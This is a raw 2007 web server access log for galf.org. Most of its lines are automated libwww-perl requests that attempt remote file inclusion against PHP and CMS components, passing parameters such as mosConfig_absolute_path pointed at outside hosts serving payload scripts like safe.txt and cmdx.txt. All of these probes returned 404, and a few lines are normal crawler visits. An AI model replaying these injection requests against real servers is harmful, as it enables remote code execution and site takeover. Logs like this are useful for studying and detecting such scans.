217.172.47.11 - - [30/Jul/2007:00:27:09 -0700] "GET /logs/access_070716.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.172.47.11 - - [30/Jul/2007:00:27:09 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.172.47.11 - - [30/Jul/2007:00:27:09 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.172.47.45 - - [30/Jul/2007:00:27:10 -0700] "GET /logs/access.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:00:27:35 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nomercycod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:00:27:35 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nomercycod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
216.242.44.64 - - [30/Jul/2007:00:27:49 -0700] "GET /logs/index.php?go=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:27:49 -0700] "GET /index.php?go=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.108.223.95 - - [30/Jul/2007:00:32:00 -0700] "GET /logs/access_070226.log HTTP/1.0" 200 337902 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:00:32:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:00:32:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:00:35:08 -0700] "GET /logs/index2.php?content=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:00:35:08 -0700] "GET /index2.php?content=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:00:35:33 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nomercycod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:35:48 -0700] "GET /logs/index.php?go=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:35:48 -0700] "GET /index.php?go=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:00:36:16 -0700] "GET /logs/access_070716.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nomercycod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:00:37:03 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:00:37:03 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.22.90.110 - - [30/Jul/2007:00:38:04 -0700] "GET /logs/index2.php?content=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [30/Jul/2007:00:38:04 -0700] "GET /index2.php?content=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.22.230 - - [30/Jul/2007:00:40:41 -0700] "GET /logs/access_070507.log HTTP/1.0" 200 241846 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
4.79.181.231 - - [30/Jul/2007:00:42:11 -0700] "GET /logsmiddle.php?file=http://www.iwc.edu/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.242.23.235 - - [30/Jul/2007:00:45:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.242.23.235 - - [30/Jul/2007:00:45:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:00:50:05 -0700] "GET /logs/index2.php?url_page=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:00:50:06 -0700] "GET /index2.php?url_page=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:00:52:06 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:00:52:06 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:00:53:36 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://h1.ripway.com/agi/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:00:53:36 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://h1.ripway.com/agi/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:53:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.phoenixinstitut.at/phoenix/includes/nn? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:53:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.phoenixinstitut.at/phoenix/includes/nn? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:01:02:47 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://h1.ripway.com/agi/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [30/Jul/2007:01:03:29 -0700] "GET /logs/access_070716.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://h1.ripway.com/agi/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.67.246.201 - - [30/Jul/2007:01:06:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.67.246.201 - - [30/Jul/2007:01:06:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:08:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:08:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.19.214 - - [30/Jul/2007:01:08:57 -0700] "GET /logs/scripts.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:10:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
89.106.79.20 - - [30/Jul/2007:01:10:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.1.146 - - [30/Jul/2007:01:11:27 -0700] "GET /logs/index.php?file=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [30/Jul/2007:01:11:27 -0700] "GET /index.php?file=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:12:51 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:12:51 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:12:53 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:12:53 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.193.194 - - [30/Jul/2007:01:19:55 -0700] "GET /logs/libsecure.php?abs_path=http://limbo.rentahost.ch/modules/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.193.194 - - [30/Jul/2007:01:19:56 -0700] "GET /libsecure.php?abs_path=http://limbo.rentahost.ch/modules/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.112.140.161 - - [30/Jul/2007:01:20:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
62.112.140.161 - - [30/Jul/2007:01:20:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
62.112.140.161 - - [30/Jul/2007:01:21:28 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
62.112.140.161 - - [30/Jul/2007:01:21:33 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
62.67.246.201 - - [30/Jul/2007:01:25:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.67.246.201 - - [30/Jul/2007:01:25:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.112.140.161 - - [30/Jul/2007:01:25:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.112.140.161 - - [30/Jul/2007:01:25:22 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.112.140.161 - - [30/Jul/2007:01:27:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.173.72.3 - - [30/Jul/2007:01:27:13 -0700] "GET /index.php?pag=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.173.72.3 - - [30/Jul/2007:01:27:13 -0700] "GET /index.php?pag=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.140.161 - - [30/Jul/2007:01:27:16 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.67.246.201 - - [30/Jul/2007:01:27:16 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.246.201 - - [30/Jul/2007:01:27:16 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:01:30:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:01:30:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
62.67.246.201 - - [30/Jul/2007:01:31:16 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.246.201 - - [30/Jul/2007:01:31:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.1.146 - - [30/Jul/2007:01:31:44 -0700] "GET /logs/index2.php?content=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [30/Jul/2007:01:31:45 -0700] "GET /index2.php?content=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.6.23.20 - - [30/Jul/2007:01:32:21 -0700] "GET /logs/access_070514.log HTTP/1.0" 200 248063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.232.122.224 - - [30/Jul/2007:01:36:22 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:01:36:22 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.204.130 - - [30/Jul/2007:01:37:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [30/Jul/2007:01:37:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [30/Jul/2007:01:37:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [30/Jul/2007:01:37:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [30/Jul/2007:01:37:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [30/Jul/2007:01:37:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:01:39:26 -0700] "GET /logs/index.php?go=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:01:39:27 -0700] "GET /index.php?go=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.111.59.150 - - [30/Jul/2007:01:41:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.grayswood.com/v-webmail/tmp/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.111.59.150 - - [30/Jul/2007:01:41:56 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.grayswood.com/v-webmail/tmp/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:44:12 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:44:12 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:44:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:44:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:48:58 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
89.106.79.20 - - [30/Jul/2007:01:48:58 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:01:49:49 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:01:49:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [30/Jul/2007:01:52:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
89.106.79.20 - - [30/Jul/2007:01:52:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:01:56:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:01:56:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
201.217.87.210 - - [30/Jul/2007:01:59:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.217.87.210 - - [30/Jul/2007:01:59:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.120.19.95 - - [30/Jul/2007:02:04:15 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.120.19.95 - - [30/Jul/2007:02:04:17 -0700] "GET /modules/My_eGallery/index.php?basepath=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.250 - - [30/Jul/2007:02:06:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.punkmonksf.com/includes/js/ThemeOffice/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.250 - - [30/Jul/2007:02:06:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.punkmonksf.com/includes/js/ThemeOffice/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.223.107.12 - - [30/Jul/2007:02:07:19 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.bourreau-immobilier.com/scripts/.css/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.223.107.12 - - [30/Jul/2007:02:07:19 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.bourreau-immobilier.com/scripts/.css/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:02:18:53 -0700] "GET /logs/index2.php?x=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:02:18:53 -0700] "GET /index2.php?x=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.241.208.168 - - [30/Jul/2007:02:19:02 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://chireo.info/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.109.30.182 - - [30/Jul/2007:02:19:52 -0700] "GET http://www.galf.org/logs/access.log HTTP/1.0" 200 122168 "-" "elxpjnwkntcbuhotqlnxjpf9mygn" "www.galf.org"
141.30.84.195 - - [30/Jul/2007:02:20:21 -0700] "GET /logs/index.php?*=http://200.78.233.83/formtutor/claroline150/claroline.old.trash/inc/htmlarea/lang/languages.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.30.84.195 - - [30/Jul/2007:02:20:21 -0700] "GET /index.php?*=http://200.78.233.83/formtutor/claroline150/claroline.old.trash/inc/htmlarea/lang/languages.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.215.81.26 - - [30/Jul/2007:02:24:40 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.bourreau-immobilier.com/scripts/.css/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.81.26 - - [30/Jul/2007:02:24:41 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.bourreau-immobilier.com/scripts/.css/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:02:24:55 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [30/Jul/2007:02:24:55 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.28.112.79 - - [30/Jul/2007:02:28:19 -0700] "GET /index.php?pag=http://www.northforkclearlake.com/999/9999? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.79 - - [30/Jul/2007:02:28:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.northforkclearlake.com/999/9999? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [30/Jul/2007:02:28:52 -0700] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [30/Jul/2007:02:28:53 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.242.192.9 - - [30/Jul/2007:02:30:55 -0700] "GET / HTTP/1.1" 200 1048 "http://www.runa.org.pe/divsexual/enlaces.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "www.galf.org"
201.217.87.210 - - [30/Jul/2007:02:31:09 -0700] "GET /logs/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.217.87.210 - - [30/Jul/2007:02:31:10 -0700] "GET /index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.242.192.9 - - [30/Jul/2007:02:31:14 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "www.galf.org"
66.109.30.182 - - [30/Jul/2007:02:32:04 -0700] "GET http://www.galf.org/logs/access_070716.log HTTP/1.0" 200 196608 "-" "ophnadsncqsywhxjyjbbvjojqyfpyidrcvgsg" "www.galf.org"
213.132.171.251 - - [30/Jul/2007:02:35:30 -0700] "GET /logs/middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.132.171.251 - - [30/Jul/2007:02:35:30 -0700] "GET /middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.88.171.29 - - [30/Jul/2007:02:35:46 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
